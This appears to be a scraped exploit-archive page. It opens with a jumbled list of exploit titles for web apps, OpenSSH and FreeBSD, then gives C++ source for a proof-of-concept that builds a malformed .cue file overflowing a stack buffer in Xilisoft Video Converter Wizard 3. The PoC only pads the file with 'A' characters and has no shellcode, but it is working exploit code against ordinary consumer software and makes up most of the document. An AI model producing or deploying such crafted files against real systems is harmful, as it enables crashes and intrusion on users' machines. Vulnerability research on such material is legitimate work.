
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
139 lines
3.9 KiB
C++
Executable file
139 lines
3.9 KiB
C++
Executable file
/*
|
|
----------------------------------------------------------------------------------------
|
|
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC
|
|
|
|
name: xilisoft.cpp
|
|
|
|
Credits : fl0 fl0w
|
|
----------------------------------------------------------------------------------------
|
|
ScreanShot in the debugger
|
|
|
|
Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html
|
|
|
|
http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
|
|
----------------------------------------------------------------------------------------
|
|
*/
|
|
|
|
//Start
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
#include <assert.h>
|
|
#include <windows.h>
|
|
|
|
#define SIZE 100000
|
|
|
|
#define FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."
|
|
|
|
class EXPLOIT {
|
|
public:
|
|
|
|
int check (char *, char *);
|
|
void Usage (char *);
|
|
};
|
|
|
|
static int Poz = 1;
|
|
static int Neg = 0;
|
|
|
|
int i;
|
|
|
|
char Name [SIZE];
|
|
char NeWbuff [SIZE];
|
|
|
|
|
|
int main (int argc, char *argv [])
|
|
|
|
{
|
|
|
|
EXPLOIT VIDEO;
|
|
|
|
|
|
if ( argc < 2)
|
|
|
|
VIDEO.Usage ( argv [0]);
|
|
|
|
if ( VIDEO.check ( argv [1], "-file") == Neg) {
|
|
|
|
fprintf ( stdout , " Incorect input ");
|
|
|
|
printf ( " \t..Usage is %s -file filename.. \n", Name);
|
|
|
|
exit ( 0);
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
do {
|
|
|
|
NeWbuff [i] = 'A';
|
|
|
|
i++;
|
|
|
|
}while (i < 500);
|
|
|
|
|
|
|
|
FILE *f;
|
|
|
|
strcpy (Name, argv [2]);
|
|
|
|
strcat (Name, " .cue ");
|
|
|
|
f = fopen (Name, "w");
|
|
|
|
assert ( f != NULL);
|
|
|
|
|
|
|
|
|
|
strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF));
|
|
|
|
|
|
|
|
fputs("FILE \"", f);
|
|
|
|
fprintf ( f, " %s ", NeWbuff);
|
|
|
|
|
|
fprintf ( stdout , "File build ! ");
|
|
|
|
exit ( 0);
|
|
|
|
getchar ();
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
|
|
|
|
int EXPLOIT::check (char *Arg_, char *_Arg)
|
|
|
|
{
|
|
|
|
if ( strcmp ( Arg_, _Arg) == 0)
|
|
|
|
return Poz;
|
|
|
|
return Neg;
|
|
|
|
}
|
|
|
|
void EXPLOIT::Usage (char *Name)
|
|
|
|
{
|
|
system ("cls");
|
|
fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
|
|
printf ( " \t..Usage is %s -file filename.. \n", Name);
|
|
fprintf ( stdout , "..All Credits fl0 fl0w.. \n");
|
|
|
|
|
|
}
|
|
|
|
|
|
//EOF
|
|
|
|
// milw0rm.com [2009-04-10]
|